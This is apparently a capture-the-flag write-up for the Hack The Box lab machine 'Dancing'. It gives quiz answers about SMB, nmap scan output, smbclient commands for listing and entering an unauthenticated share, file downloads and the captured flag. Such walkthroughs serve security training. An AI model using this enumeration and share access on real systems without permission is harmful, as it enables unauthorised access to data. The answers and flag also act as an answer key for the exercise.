Dancing
What does the 3-letter acronym SMB stand for?
Server Message Block
What port does SMB use to operate at?
445
What network communication model does SMB use, architecturally speaking?
client-server model
What is the service name for port 445 that came up in our nmap scan?
1
2
3
4
5
6
7
8
9
10
➜ kali nmap -sC -sV -p445 -Pn 10.129.159.248
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-15 08:10 EST
Nmap scan report for 10.129.159.248
Host is up.
PORT STATE SERVICE VERSION
445/tcp filtered microsoft-ds
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.58 seconds
microsoft-ds
What is the tool we use to connect to SMB shares from our Linux distribution?
smbclient
What is the flag or switch we can use with the SMB tool to list the contents of the share?
-L
What is the name of the share we are able to access in the end?
WorkShares
What is the command we can use within the SMB shell to download the files we find?
get
Submit root flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
➜ nmap -sC -sV -p- -T4 -Pn 10.129.140.230
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 08:09 EST
Nmap scan report for 10.129.140.230 (10.129.140.230)
Host is up (0.24s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-22T17:23:45
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 849.55 seconds
1
2
3
4
5
6
7
8
9
10
➜ smbclient -L ////10.129.140.230//
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
SMB1 disabled -- no workgroup available
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
➜ smbclient \\\\10.129.140.230\\WorkShares
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Mar 29 04:22:01 2021
.. D 0 Mon Mar 29 04:22:01 2021
Amy.J D 0 Mon Mar 29 05:08:24 2021
James.P D 0 Thu Jun 3 04:38:03 2021
5114111 blocks of size 4096. 1728838 blocks available
smb: \> cd Amy.J\
smb: \Amy.J\> ls
. D 0 Mon Mar 29 05:08:24 2021
.. D 0 Mon Mar 29 05:08:24 2021
worknotes.txt A 94 Fri Mar 26 07:00:37 2021
5114111 blocks of size 4096. 1728838 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Amy.J\> cd ..
smb: \> cd James.P\
smb: \James.P\> ls
. D 0 Thu Jun 3 04:38:03 2021
.. D 0 Thu Jun 3 04:38:03 2021
flag.txt A 32 Mon Mar 29 05:26:57 2021
5114111 blocks of size 4096. 1748693 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \James.P\> exit
➜ cat flag.txt
5f61c10dffbc77a704d76016a22f1664#
➜ cat worknotes.txt
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing #
HTB{5f61c10dffbc77a704d76016a22f1664}
This post is licensed under CC BY 4.0 by the author.
Comments powered by Disqus.